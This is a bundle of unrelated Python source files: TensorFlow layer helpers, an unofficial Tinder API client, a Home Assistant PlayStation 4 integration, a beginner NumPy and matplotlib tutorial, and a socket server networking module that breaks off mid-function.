stride = get_4dshape(stride)
assert inpvar.ndims == 4
assert padding in ('VALID', 'SAME')
assert inpvar.static_shape[3] is not None
cin, cout = inpvar.static_shape[3], nr_output_channels
W_shape = kernel + (cin, cout)
if W is None:
W = tf.contrib.layers.xavier_initializer_conv2d()
W = O.ensure_variable('W', W, shape=W_shape, dtype=param_dtype)
if use_bias:
if bias_is_shared_in_channel:
b_shape = (cout, )
else:
assert inpvar.static_shape[1] is not None and inpvar.static_shape[2] is not None
b_shape = inpvar.static_shape[1:3] + (cout, )
if b is None:
b = tf.constant_initializer()
b = O.ensure_variable('b', b, shape=b_shape, dtype=param_dtype)
_ = inpvar
_ = tf.nn.conv2d(_, W, strides=stride, padding=padding, name='conv')
if use_bias:
_ = tf.nn.bias_add(_, b, name='bias')
_ = nonlin(_, name='nonlin')
return tf.identity(_, name='out')
@wrap_force_named_op
def pooling2d(name, inpvar, kernel, stride=None, padding='VALID', method='MAX'):
inpvar = as_varnode(inpvar)
kernel = get_4dshape(kernel)
stride = get_4dshape(stride, kernel)
assert inpvar.ndims == 4
if method == 'MAX':
func = tf.nn.max_pool
else:
assert method == 'AVG'
func = tf.nn.avg_pool
return func(inpvar, ksize=kernel, strides=stride, padding=padding, name='out')
max_pooling2d = functools.partial(pooling2d, method='MAX')
avg_pooling2d = functools.partial(pooling2d, method='AVG')
@wrap_force_named_op
def fc(name, inpvar, nr_output_channels,
use_bias=True, nonlin=__default_nonlin__,
W=None, b=None, param_dtype=__default_dtype__):
inpvar = O.flatten2(inpvar)
assert inpvar.static_shape[1] is not None
W_shape = (inpvar.static_shape[1], nr_output_channels)
b_shape = (nr_output_channels, )
if W is None:
W = tf.contrib.layers.xavier_initializer()
W = O.ensure_variable('W', W, shape=W_shape, dtype=param_dtype)
if use_bias:
if b is None:
b = tf.constant_initializer()
b = O.ensure_variable('b', b, shape=b_shape, dtype=param_dtype)
out = tf.nn.xw_plus_b(inpvar, W, b, name='xwpb') if use_bias else tf.matmul(inpvar, W, name='matmul')
out = nonlin(out, name='nonlin')
return tf.identity(out, name='out')
@wrap_force_named_op
def ntn(name, lhs, rhs, nr_output_channels,
use_bias=True, nonlin=__default_nonlin__,
W=None, b=None, param_dtype=__default_dtype__):
lhs, rhs= map(O.flatten2, [lhs, rhs])
assert lhs.static_shape[1] is not None and rhs.static_shape[1] is not None
W_shape = (lhs.static_shape[1], nr_output_channels, rhs.static_shape[1])
b_shape = (nr_output_channels, )
if W is None:
W = tf.contrib.layers.xavier_initializer()
W = O.ensure_variable('W', W, shape=W_shape, dtype=param_dtype)
if use_bias:
if b is None:
b = tf.constant_initializer()
b = O.ensure_variable('b', b, shape=b_shape, dtype=param_dtype)
out = tf.einsum('ia,abc,ic->ib', lhs.tft, W.tft, rhs.tft)
if use_bias:
out = tf.identity(out + b.add_axis(0), name='bias')
out = nonlin(out, name='nonlin')
return tf.identity(out, name='out')
@wrap_force_named_op
def dropout(name, inpvar, keep_prob, keep_prob_sym=None, noise_shape=None, seed=None):
env = get_default_env()
if env.flags.compute_enable_dropout(name):
keep_prob_sym = keep_prob
out = tf.nn.dropout(inpvar, keep_prob_sym, noise_shape=noise_shape, seed=seed, name='dropout')
else:
out = inpvar
return tf.identity(out, name='out')
@wrap_force_named_op
def batch_norm(name, inpvar, decay=0.9, epsilon=1e-5, use_affine=True, param_dtype=__default_dtype__):
"""
Batch normalization.
:param name: operator name
:param inpvar: input tensor, of data type NHWC
:param decay: decay for moving average
:param epsilon: epsilon
:param use_affine: add affine transformation after the normalization (to preserve the bias and scale)
:param param_dtype: param dtype
:return: output tensor
"""
from tensorflow.python.training import moving_averages
assign_moving_average = moving_averages.assign_moving_average
inpvar = as_varnode(inpvar)
shape = inpvar.static_shape
assert len(shape) in [2, 4]
nr_channels = shape[-1]
if len(shape) == 2:
inpvar = inpvar.reshape(-1, 1, 1, nr_channels)
if use_affine:
beta = O.variable('beta', tf.constant_initializer(), shape=[nr_channels], dtype=param_dtype)
gamma = O.variable('gamma', tf.constant_initializer(1.0), shape=[nr_channels], dtype=param_dtype)
else:
beta = O.zeros([nr_channels], name='beta')
gamma = O.ones([nr_channels], name='gamma')
moving_mean = O.variable('mean/ema', tf.constant_initializer(), shape=[nr_channels], trainable=False)
moving_var = O.variable('variance/ema', tf.constant_initializer(1.0), shape=[nr_channels], trainable=False)
env = get_default_env()
if env.flags.compute_update_batch_normalization(name):
xn, batch_mean, batch_var = tf.nn.fused_batch_norm(inpvar, gamma, beta, epsilon=epsilon, is_training=True, name='bn')
else:
xn = tf.nn.batch_normalization(inpvar, moving_mean, moving_var, beta, gamma, variance_epsilon=epsilon, name='bn')
if len(shape) == 2:
xn = O.remove_axis(xn, [1, 2])
if env.flags.compute_update_batch_normalization(name) and \
(not env.has_current_dpc() or env.current_dpc.is_master_device):
update_mean_op = assign_moving_average(moving_mean.impl, batch_mean, decay, zero_debias=False, name='mean_ema_op')
update_var_op = assign_moving_average(moving_var.impl, batch_var, decay, zero_debias=False, name='var_ema_op')
with tf.control_dependencies([update_mean_op, update_var_op]):
return tf.identity(xn, name='out')
else:
return tf.identity(xn, name='out')
@wrap_force_named_op
def deconv2d(name, inpvar, nr_output_channels, kernel, stride=1, padding='SAME', out_shape=None,
use_bias=True, bias_is_shared_in_channel=True,
nonlin=__default_nonlin__,
W=None, b=None, param_dtype=__default_dtype__):
inpvar = as_varnode(inpvar)
in_shape = inpvar.static_shape
nr_input_channels = in_shape[3]
assert nr_input_channels is not None
kernel = get_2dshape(kernel)
stride2 = get_2dshape(stride)
stride4 = get_4dshape(stride)
if out_shape is None:
sd_h = StaticDynamicDim(in_shape[1], inpvar.shape[1]) * stride2[0]
sd_w = StaticDynamicDim(in_shape[2], inpvar.shape[2]) * stride2[1]
out_shape_static = [in_shape[0], sd_h.static, sd_w.static, nr_output_channels]
out_shape_dynamic = O.canonize_sym_shape([inpvar.shape[0], sd_h.dynamic, sd_w.dynamic, nr_output_channels])
else:
out_shape = get_2dshape(out_shape)
out_shape_static = [in_shape[0], out_shape[0], out_shape[1], nr_output_channels]
out_shape_dynamic = O.canonize_sym_shape([inpvar.shape[0], out_shape[0], out_shape[1], nr_output_channels])
W_shape = kernel + (nr_output_channels, nr_input_channels)
if W is None:
W = tf.contrib.layers.xavier_initializer_conv2d()
W = O.ensure_variable('W', W, shape=W_shape, dtype=param_dtype)
if use_bias:
if bias_is_shared_in_channel:
b_shape = (nr_output_channels, )
else:
assert in_shape[1] is not None and in_shape[2] is not None
b_shape = in_shape[1:3] + (nr_output_channels, )
if b is None:
b = tf.constant_initializer()
b = O.ensure_variable('b', b, shape=b_shape, dtype=param_dtype)
_ = inpvar
_ = tf.nn.conv2d_transpose(_, W, out_shape_dynamic, stride4, padding=padding, data_format='NHWC', name='conv')
_.set_shape(tf.TensorShape(out_shape_static))
if use_bias:
_ = tf.nn.bias_add(_, b, name='bias')
_ = nonlin(_, name='nonlin')
return tf.identity(_, name='out')
|
|
# coding=utf-8
import json
import config
import requests
get_headers = {
'app_version': '6.9.4',
'platform': 'ios',
"User-agent": "Tinder/7.5.3 (iPhone; iOS 10.3.2; Scale/2.00)",
"Accept": "application/json"
}
headers = get_headers.copy()
headers['content-type'] = "application/json"
def get_auth_token(fb_auth_token, fb_user_id):
if "error" in fb_auth_token:
return {"error": "could not retrieve fb_auth_token"}
if "error" in fb_user_id:
return {"error": "could not retrieve fb_user_id"}
url = config.host + '/v2/auth/login/facebook'
req = requests.post(url,
headers=headers,
data=json.dumps(
{'token': fb_auth_token, 'facebook_id': fb_user_id})
)
try:
tinder_auth_token = req.json()["data"]["api_token"]
headers.update({"X-Auth-Token": tinder_auth_token})
get_headers.update({"X-Auth-Token": tinder_auth_token})
print("You have been successfully authorized!")
return tinder_auth_token
except Exception as e:
print(e)
return {"error": "Something went wrong. Sorry, but we could not authorize you."}
def authverif():
res = get_auth_token(config.fb_access_token, config.fb_user_id)
if "error" in res:
return False
return True
def get_recommendations():
'''
Returns a list of users that you can swipe on
'''
try:
r = requests.get('https://api.gotinder.com/user/recs', headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong with getting recomendations:", e)
def get_updates(last_activity_date=""):
'''
Returns all updates since the given activity date.
The last activity date is defaulted at the beginning of time.
Format for last_activity_date: "2017-07-09T10:28:13.392Z"
'''
try:
url = config.host + '/updates'
r = requests.post(url,
headers=headers,
data=json.dumps({"last_activity_date": last_activity_date}))
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong with getting updates:", e)
def get_self():
'''
Returns your own profile data
'''
try:
url = config.host + '/profile'
r = requests.get(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get your data:", e)
def change_preferences(**kwargs):
'''
ex: change_preferences(age_filter_min=30, gender=0)
kwargs: a dictionary - whose keys become separate keyword arguments and the values become values of these arguments
age_filter_min: 18..46
age_filter_max: 22..55
age_filter_min <= age_filter_max - 4
gender: 0 == seeking males, 1 == seeking females
distance_filter: 1..100
discoverable: true | false
{"photo_optimizer_enabled":false}
'''
try:
url = config.host + '/profile'
r = requests.post(url, headers=headers, data=json.dumps(kwargs))
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not change your preferences:", e)
def get_meta():
'''
Returns meta data on yourself. Including the following keys:
['globals', 'client_resources', 'versions', 'purchases',
'status', 'groups', 'products', 'rating', 'tutorials',
'travel', 'notifications', 'user']
'''
try:
url = config.host + '/meta'
r = requests.get(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get your metadata:", e)
def get_meta_v2():
'''
Returns meta data on yourself from V2 API. Including the following keys:
['account', 'client_resources', 'plus_screen', 'boost',
'fast_match', 'top_picks', 'paywall', 'merchandising', 'places',
'typing_indicator', 'profile', 'recs']
'''
try:
url = config.host + '/v2/meta'
r = requests.get(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get your metadata:", e)
def update_location(lat, lon):
'''
Updates your location to the given float inputs
Note: Requires a passport / Tinder Plus
'''
try:
url = config.host + '/passport/user/travel'
r = requests.post(url, headers=headers, data=json.dumps({"lat": lat, "lon": lon}))
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not update your location:", e)
def reset_real_location():
try:
url = config.host + '/passport/user/reset'
r = requests.post(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not update your location:", e)
def get_recs_v2():
'''
This works more consistently then the normal get_recommendations becuase it seeems to check new location
'''
try:
url = config.host + '/v2/recs/core?locale=en-US'
r = requests.get(url, headers=headers)
return r.json()
except Exception as e:
print('excepted')
def set_webprofileusername(username):
'''
Sets the username for the webprofile: https://www.gotinder.com/@YOURUSERNAME
'''
try:
url = config.host + '/profile/username'
r = requests.put(url, headers=headers,
data=json.dumps({"username": username}))
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not set webprofile username:", e)
def reset_webprofileusername(username):
'''
Resets the username for the webprofile
'''
try:
url = config.host + '/profile/username'
r = requests.delete(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not delete webprofile username:", e)
def get_person(id):
'''
Gets a user's profile via their id
'''
try:
url = config.host + '/user/%s' % id
r = requests.get(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get that person:", e)
def send_msg(match_id, msg):
try:
url = config.host + '/user/matches/%s' % match_id
r = requests.post(url, headers=headers,
data=json.dumps({"message": msg}))
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not send your message:", e)
def unmatch(match_id):
try:
url = config.host + '/user/matches/%s' % match_id
r = requests.delete(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not unmatch person:", e)
def superlike(person_id):
try:
url = config.host + '/like/%s/super' % person_id
r = requests.post(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not superlike:", e)
def like(person_id):
try:
url = config.host + '/like/%s' % person_id
r = requests.get(url, headers=get_headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not like:", e)
def dislike(person_id):
try:
url = config.host + '/pass/%s' % person_id
r = requests.get(url, headers=get_headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not dislike:", e)
def report(person_id, cause, explanation=''):
'''
There are three options for cause:
0 : Other and requires an explanation
1 : Feels like spam and no explanation
4 : Inappropriate Photos and no explanation
'''
try:
url = config.host + '/report/%s' % person_id
r = requests.post(url, headers=headers, data={
"cause": cause, "text": explanation})
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not report:", e)
def match_info(match_id):
try:
url = config.host + '/matches/%s' % match_id
r = requests.get(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get your match info:", e)
def all_matches():
try:
url = config.host + '/v2/matches'
r = requests.get(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get your match info:", e)
def fast_match_info():
try:
url = config.host + '/v2/fast-match/preview'
r = requests.get(url, headers=headers)
count = r.headers['fast-match-count']
# image is in the response but its in hex..
return count
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get your fast-match count:", e)
def trending_gifs(limit=3):
try:
url = config.host + '/giphy/trending?limit=%s' % limit
r = requests.get(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get the trending gifs:", e)
def gif_query(query, limit=3):
try:
url = config.host + '/giphy/search?limit=%s&query=%s' % (limit, query)
r = requests.get(url, headers=headers)
return r.json()
except requests.exceptions.RequestException as e:
print("Something went wrong. Could not get your gifs:", e)
# def see_friends():
# try:
# url = config.host + '/group/friends'
# r = requests.get(url, headers=headers)
# return r.json()['results']
# except requests.exceptions.RequestException as e:
# print("Something went wrong. Could not get your Facebook friends:", e)
|
|
"""Support for PlayStation 4 consoles."""
import logging
import os
from pyps4_2ndscreen.ddp import async_create_ddp_endpoint
from pyps4_2ndscreen.media_art import COUNTRIES
import voluptuous as vol
from homeassistant.components.media_player.const import (
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_TITLE,
MEDIA_TYPE_GAME,
)
from homeassistant.const import (
ATTR_COMMAND,
ATTR_ENTITY_ID,
ATTR_LOCKED,
CONF_REGION,
CONF_TOKEN,
)
from homeassistant.core import HomeAssistant, split_entity_id
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_validation as cv, entity_registry
from homeassistant.util import location
from homeassistant.util.json import load_json, save_json
from .config_flow import PlayStation4FlowHandler # noqa: F401
from .const import (
ATTR_MEDIA_IMAGE_URL,
COMMANDS,
COUNTRYCODE_NAMES,
DOMAIN,
GAMES_FILE,
PS4_DATA,
)
_LOGGER = logging.getLogger(__name__)
SERVICE_COMMAND = "send_command"
PS4_COMMAND_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_COMMAND): vol.In(list(COMMANDS)),
}
)
PLATFORMS = ["media_player"]
class PS4Data:
"""Init Data Class."""
def __init__(self):
"""Init Class."""
self.devices = []
self.protocol = None
async def async_setup(hass, config):
"""Set up the PS4 Component."""
hass.data[PS4_DATA] = PS4Data()
transport, protocol = await async_create_ddp_endpoint()
hass.data[PS4_DATA].protocol = protocol
_LOGGER.debug("PS4 DDP endpoint created: %s, %s", transport, protocol)
service_handle(hass)
return True
async def async_setup_entry(hass, entry):
"""Set up PS4 from a config entry."""
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass, entry):
"""Unload a PS4 config entry."""
return await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
async def async_migrate_entry(hass, entry):
"""Migrate old entry."""
config_entries = hass.config_entries
data = entry.data
version = entry.version
_LOGGER.debug("Migrating PS4 entry from Version %s", version)
reason = {
1: "Region codes have changed",
2: "Format for Unique ID for entity registry has changed",
}
# Migrate Version 1 -> Version 2: New region codes.
if version == 1:
loc = await location.async_detect_location_info(
hass.helpers.aiohttp_client.async_get_clientsession()
)
if loc:
country = COUNTRYCODE_NAMES.get(loc.country_code)
if country in COUNTRIES:
for device in data["devices"]:
device[CONF_REGION] = country
version = entry.version = 2
config_entries.async_update_entry(entry, data=data)
_LOGGER.info(
"PlayStation 4 Config Updated: \
Region changed to: %s",
country,
)
# Migrate Version 2 -> Version 3: Update identifier format.
if version == 2:
# Prevent changing entity_id. Updates entity registry.
registry = await entity_registry.async_get_registry(hass)
for entity_id, e_entry in registry.entities.items():
if e_entry.config_entry_id == entry.entry_id:
unique_id = e_entry.unique_id
# Remove old entity entry.
registry.async_remove(entity_id)
# Format old unique_id.
unique_id = format_unique_id(entry.data[CONF_TOKEN], unique_id)
# Create new entry with old entity_id.
new_id = split_entity_id(entity_id)[1]
registry.async_get_or_create(
"media_player",
DOMAIN,
unique_id,
suggested_object_id=new_id,
config_entry=entry,
device_id=e_entry.device_id,
)
entry.version = 3
_LOGGER.info(
"PlayStation 4 identifier for entity: %s \
has changed",
entity_id,
)
config_entries.async_update_entry(entry)
return True
msg = f"""{reason[version]} for the PlayStation 4 Integration.
Please remove the PS4 Integration and re-configure
[here](/config/integrations)."""
hass.components.persistent_notification.async_create(
title="PlayStation 4 Integration Configuration Requires Update",
message=msg,
notification_id="config_entry_migration",
)
return False
def format_unique_id(creds, mac_address):
"""Use last 4 Chars of credential as suffix. Unique ID per PSN user."""
suffix = creds[-4:]
return f"{mac_address}_{suffix}"
def load_games(hass: HomeAssistant, unique_id: str) -> dict:
"""Load games for sources."""
g_file = hass.config.path(GAMES_FILE.format(unique_id))
try:
games = load_json(g_file)
except HomeAssistantError as error:
games = {}
_LOGGER.error("Failed to load games file: %s", error)
if not isinstance(games, dict):
_LOGGER.error("Games file was not parsed correctly")
games = {}
# If file exists
if os.path.isfile(g_file):
games = _reformat_data(hass, games, unique_id)
return games
def save_games(hass: HomeAssistant, games: dict, unique_id: str):
"""Save games to file."""
g_file = hass.config.path(GAMES_FILE.format(unique_id))
try:
save_json(g_file, games)
except OSError as error:
_LOGGER.error("Could not save game list, %s", error)
def _reformat_data(hass: HomeAssistant, games: dict, unique_id: str) -> dict:
"""Reformat data to correct format."""
data_reformatted = False
for game, data in games.items():
# Convert str format to dict format.
if not isinstance(data, dict):
# Use existing title. Assign defaults.
games[game] = {
ATTR_LOCKED: False,
ATTR_MEDIA_TITLE: data,
ATTR_MEDIA_IMAGE_URL: None,
ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_GAME,
}
data_reformatted = True
_LOGGER.debug("Reformatting media data for item: %s, %s", game, data)
if data_reformatted:
save_games(hass, games, unique_id)
return games
def service_handle(hass: HomeAssistant):
"""Handle for services."""
async def async_service_command(call):
"""Service for sending commands."""
entity_ids = call.data[ATTR_ENTITY_ID]
command = call.data[ATTR_COMMAND]
for device in hass.data[PS4_DATA].devices:
if device.entity_id in entity_ids:
await device.async_send_command(command)
hass.services.async_register(
DOMAIN, SERVICE_COMMAND, async_service_command, schema=PS4_COMMAND_SCHEMA
)
|
|
# don't need to care about the first 3 lines (just some configuration for ipython notebook)
import matplotlib
matplotlib.use('Agg')
from __future__ import print_function, division, absolute_import
import os
help(os)
import numpy as np
import matplotlib.pyplot as plt
## List
X = [1, 2, 3, 4]
print('Access list element:', X[0], X[1])
print('Slicing:', X[:2], X[1:3])
X[2:4] = [8, 9] # Assign a new sublist to a slice
## Dictionary
X = {'a': 1, 'b': 2}
print('Access dictionary element:', X['a'], X['b'])
print('Keys:', X.keys())
print('Values:', X.values())
## String
X = 'abcdxyz'
print('Access character:', X[0], X[1])
print(X.capitalize()) # Capitalize a string
print(X.upper()) # Convert a string to uppercase
print(X.rjust(7)) # Right-justify a string, padding with spaces
print(X.center(7)) # Center a string, padding with spaces
print(X.replace('abc', 'haha')) # R
### Boolean
X = True
if X and False:
print('You wont see anything here.')
if X or False:
print('Now you see it')
if True:
print("Do Something")
elif False:
print("Nothing")
else:
print("Anything")
animals = ['cat', 'dog', 'monkey']
for animal in animals:
print(animal)
# adding enumerate for indexing
animals = ['cat', 'dog', 'monkey']
for idx, animal in enumerate(animals):
print('#%d: %s' % (idx + 1, animal))
# Full version
nums = [0, 1, 2, 3, 4]
squares = []
for x in nums:
squares.append(x ** 2)
print(squares)
# Short version
nums = [0, 1, 2, 3, 4]
squares = [x ** 2 for x in nums]
print(squares)
# Short and fun version
nums = [0, 1, 2, 3, 4]
squares = [x**2 if x % 2 == 0
else x**3
for x in nums
if x != 3]
print(squares)
d = {'person': 2, 'cat': 4, 'spider': 8}
for animal, numb in d.iteritems(): # always use iteritems faster than items()
print('A %s has %d legs' % (animal, numb))
for k in d.iterkeys():
print(k)
for v in d.itervalues():
print(v)
# Dictionary comprehension
nums = [0, 1, 2, 3, 4]
even_num_to_square = {x: x ** 2 for x in nums if x % 2 == 0}
print(even_num_to_square) # Prints "{0: 0, 2: 4, 4: 16}"
def sign(x):
if x > 0:
return 'positive'
elif x < 0:
return 'negative'
else:
return 'zero'
for x in [-1, 0, 1]:
print(sign(x))
def multi_purpose(x, y=1):
return x * y, x / y, x + y, x - y
a, b, c, d = multi_purpose(8)
print(a, b, c, d)
x = multi_purpose(8, y=12)
print(x)
def nestle():
def abc():
print('abc')
return abc
nestle()()
f = lambda x: [x**2 for i in range(x)]
print(f(10))
class Greeter(object):
# Constructor
def __init__(self, name):
self.name = name # Create an instance variable
# Instance method
def greet(self, loud=False):
if loud:
print('HELLO, %s!' % self.name.upper())
else:
print('Hello, %s' % self.name)
g = Greeter('Fred') # Construct an instance of the Greeter class
g.greet() # Call an instance method
g.greet(loud=True) # Call an instance method
X = np.array(
[[1, 2, 3],
[4, 5, 6],
[7, 8, 9],
[10,11,12]
], dtype='float32')
print('Basic info:', X.shape, X.dtype)
# Array indexing
print(X[0, :]) # first row, all columns
print(X[:, :2]) # all row, first 2 columns
print(X[:, -2:]) # all row, last 2 columns
# Transpose the matrix
print(X.T)
# Fastest way to shuffle or randomly sample from array
# (do not use np.random.shuffle very slow for big data)
idx = np.random.permutation(X.shape[0])
X = X[idx][:3] # sample first 3 samples
a = np.zeros((2,2)) # Create an array of all zeros
print(a)
b = np.ones((1,2)) # Create an array of all ones
print(b)
c = np.full((2,2), 7) # Create a constant array
print(c)
d = np.eye(2) # Create a 2x2 identity matrix
print(d)
e = np.random.random((2,2)) # Create an array filled with random values
print(e)
x = np.array([[1,2],
[3,4]], dtype=np.float64)
y = np.array([[5,6],
[7,8]], dtype=np.float64)
z = np.array([[1,2,3],
[4,5,6]], dtype=np.float64)
# Dot product
print(np.dot(x, y))
# Elementwise sum; both produce the array
print(x + y)
print(np.add(x, y))
# Elementwise difference; both produce the array
print(x - y)
print(np.subtract(x, y))
# Elementwise product; both produce the array
print(x * y)
print(np.multiply(x, y))
# Elementwise division; both produce the array
print(x / y)
print(np.divide(x, y))
# Elementwise square root; produces the array
print(np.sqrt(x))
print(np.sum(x)) # Compute sum of all elements;
print(np.sum(x, axis=0)) # Compute sum of each column;
print(np.sum(x, axis=1)) # Compute sum of each row
# We will add the vector v to each row of the matrix x,
# storing the result in the matrix y
x = np.array([[1, 2, 3],
[4, 5, 6],
[7, 8, 9],
[10, 11, 12]])
v = np.array([1, 0, 1])
y = np.empty_like(x) # Create an empty matrix with the same shape as x
# Add the vector v to each row of the matrix x with an explicit loop
for i in range(4):
y[i, :] = x[i, :] + v
# Now y is the following
print(y)
# We will add the vector v to each row of the matrix x,
# storing the result in the matrix y
x = np.array([[1,2,3], [4,5,6], [7,8,9], [10, 11, 12]])
v = np.array([1, 0, 1])
y = x + v # Add v to each row of x using broadcasting
print(y)
# Compute the x and y coordinates for points on a sine curve
x = np.arange(0, 3 * np.pi, 0.1)
y = np.sin(x)
# Plot the points using matplotlib
plt.figure()
plt.plot(x, y)
plt.show() # You must call plt.show() to make graphics appear.
import numpy as np
import matplotlib.pyplot as plt
# Compute the x and y coordinates for points on sine and cosine curves
x = np.arange(0, 3 * np.pi, 0.1)
y_sin = np.sin(x)
y_cos = np.cos(x)
# Plot the points using matplotlib
plt.plot(x, y_sin)
plt.plot(x, y_cos)
plt.xlabel('x axis label')
plt.ylabel('y axis label')
plt.title('Sine and Cosine')
plt.legend(['Sine', 'Cosine'])
plt.show()
# Compute the x and y coordinates for points on sine and cosine curves
x = np.arange(0, 3 * np.pi, 0.1)
y_sin = np.sin(x)
y_cos = np.cos(x)
# Set up a subplot grid that has height 2 and width 1,
# and set the first such subplot as active.
plt.subplot(2, 1, 1)
# Make the first plot
plt.plot(x, y_sin)
plt.title('Sine')
# Set the second subplot as active, and make the second plot.
plt.subplot(2, 1, 2)
plt.plot(x, y_cos)
plt.title('Cosine')
# Show the figure.
plt.show()
|
|
"""
This module handles the connections of the server.
Attributes:
receiver_running (bool): Flag to kill the receiver thread
"""
import socket
import threading
import logging
import select
import cStringIO as StringIO
import protocol
import protocol.thread
from utils import handle_except
receiver_running = True
class NetworkReceiverThread(threading.Thread):
"""
This module handles receiving data from the clients.
Attributes:
logger (logging.Logger): The logger of the thread.
logic_queue (Queue.Queue): The queue of the logic thread.
messages (dict): Dict of messages that wasn't fully received.
network_queue (Queue.Queue): The queue of the thread.
port (int): The connection port.
server (socket.socket): The main socket of the server.
sockets (dict): The sockets of the clients.
"""
def __init__(self,
network_queue,
logic_queue,
port):
"""
Initialize the receiver thread.
Args:
network_queue (Queue.Queue): The queue of the thread.
logic_queue (Queue.Queue): The queue of the logic thread.
port (int): The connection port.
"""
current_class = self.__class__
thread_name = current_class.__name__
super(current_class, self).__init__(name=thread_name)
self.logger = logging.getLogger('network')
self.network_queue = network_queue
self.logic_queue = logic_queue
self.port = port
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sockets = {}
# dict to store incomplete messages
# keys are sockets, values are pairs of:
# (received data (str), number of missing bytes (int))
self.messages = {}
def receive(self, sock, bytes):
"""
Receive a bytes from socket.
If the socket fail, then it is removed from the socket list,
and returns empty string.
Args:
sock (socket.socket): The socket to receive bytes from.
bytes (int): The number of bytes to receive.
Returns:
str: The received string.
"""
try:
received = sock.recv(bytes)
except:
received = ''
# if connection is closed, remove it
if received == '':
# inverse lookup of ip matching the sockt in the dict self.sockets
ip = (key for key, value in self.sockets.items()
if value == sock).next()
self.logger.debug('client %s disconnected' % ip)
# announce the disconnected socket and remove it
message = protocol.thread.disconnected(
client=ip)
self.logic_queue.put(message)
self.network_queue.put(message)
del self.sockets[ip]
return received
@handle_except('network')
def run(self):
"""Execute the network receiver thread."""
self.logger.info('NetworkReceiverThread thread started')
global receiver_running
self.server.bind(('', self.port))
self.server.listen(5)
while receiver_running:
# test which socket sent data
all_sockets = self.sockets.values() + [self.server]
recv_from_sockets, _, _ = select.select(all_sockets, [], [], 0.2)
for s in recv_from_sockets:
# if new client trying to connect, accept it
if s is self.server:
new_socket, address = s.accept()
ip = new_socket.getpeername()[0]
self.sockets[ip] = new_socket
message = protocol.thread.new_socket(
socket=new_socket)
self.network_queue.put(message)
self.logger.debug('new connection to client %s' % ip)
# if a connected client send a message, receive it
else:
# if this is a part of a message that alreay begun to send,
# add it to the messages dict
if s in self.messages:
buff, missing_bytes = self.messages[s]
received = self.receive(s, missing_bytes)
buff.write(received)
missing_bytes -= len(received)
self.messages[s] = buff, missing_bytes
# if no bytes are missing, the message is received
# pass it to the logic thread, and remove from queue
if missing_bytes == 0:
content = buff.getvalue()
buff.close()
message = protocol.thread.received(
message=content, client=s.getpeername()[0])
self.logic_queue.put(message)
del self.messages[s]
self.logger.debug(
'received a message from %s: %s...'
% (s.getpeername()[0], repr(content[:5])))
else:
self.logger.debug('received part of message. ' +
'total bytes: %s, left %s.' %
(len(received), missing_bytes))
# if this is the first part of a message,
# add it to the message dict
else:
size_str = self.receive(s, 4)
# if connection is closed, remove it
if size_str != '':
size = protocol.get_size(size_str)
self.messages[s] = (StringIO.StringIO(), size)
self.logger.debug('new message of size %s' % size)
self.server.close()
self.logger.info('NetworkReceiverThread thread ended')
class NetworkSenderThread(threading.Thread):
"""
This module handles sending data to the clients.
Attributes:
logger (logging.Logger): The logger of the thread.
logic_queue (Queue.Queue): The queue of the logic thread.
network_queue (Queue.Queue): The queue of the thread.
running (bool): The flag of the main loop.
sockets (dict): Dict of the connections.
"""
def __init__(self,
network_queue,
logic_queue,
port):
"""
Initialize the sender thread.
Args:
logic_queue (Queue.Queue): The queue of the logic thread.
network_queue (Queue.Queue): The queue of the thread.
port (int): The connection port.
"""
current_class = self.__class__
thread_name = current_class.__name__
super(current_class, self).__init__(name=thread_name)
self.logger = logging.getLogger('network')
self.network_queue = network_queue
self.logic_queue = logic_queue
self.sockets = {}
self.running = True
@handle_except('network')
def send(self, sock, message):
"""
Send a message a client.
if the send fails, the client removed from the client list.
Args:
sock (socket.socket): The client.
message (str): The message
"""
try:
sock.send(message)
except:
ip = sock.getpeername()[0]
thread_message = protocol.thread.disconnected(
client=ip)
self.logic_queue.put(thread_message)
del self.sockets[ip]
@handle_except('network')
def run(self):
"""Execute the network sender thread."""
self.logger.info('NetworkThread thread started')
global receiver_running
while self.running:
# get a message from the queue
message = self.network_queue.get()
message_type = message['type']
# send a message to the clients
if message_type == 'send':
client = message['client']
net_message = message['message']
if client == '*':
for ip in self.sockets:
self.send(self.sockets[ip], net_message)
elif client in self.sockets:
self.send(self.sockets[client], net_message)
else:
self.logger.warning(
'there is no client %s, can\'t send message' % client)
# add new socket to the list
elif message_type == 'new_socket':
s = message['socket']
ip = s.getpeername()[0]
self.sockets[ip] = s
message = protocol.thread.connected(ip=ip)
self.logic_queue.put(message)
# remove a socket from the list
elif message_type == 'disconnected':
ip = message['client']
try:
